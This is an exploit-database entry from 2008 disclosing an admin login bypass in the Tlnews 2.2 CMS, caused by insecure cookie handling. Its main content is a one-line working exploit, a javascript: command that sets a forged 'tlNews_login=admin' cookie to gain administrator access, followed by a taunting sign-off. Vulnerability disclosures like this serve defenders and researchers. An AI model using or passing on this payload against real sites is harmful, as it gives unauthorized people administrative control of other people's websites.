id: 3951
date: 10/24/2008
title: Tlnews 2.2 Insecure Cookie Handling Vulnerability
author: x0r
cves: 

=================================================
Tlnews 2.2 Insecure Cookie Handling Vulnerability
=================================================


Tlnews 2.2 Admin Login Bypass (via Cookie)
Found by X0r - EvolutionTeaM

Cms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip

Exploit: javascript:document.cookie = "tlNews_login=admin; content=admin;
path=/"

Beby y0ur system g0t d0wn :P 

// X0r - EvolutionTeaM



#  0day.today [2023-03-27]  #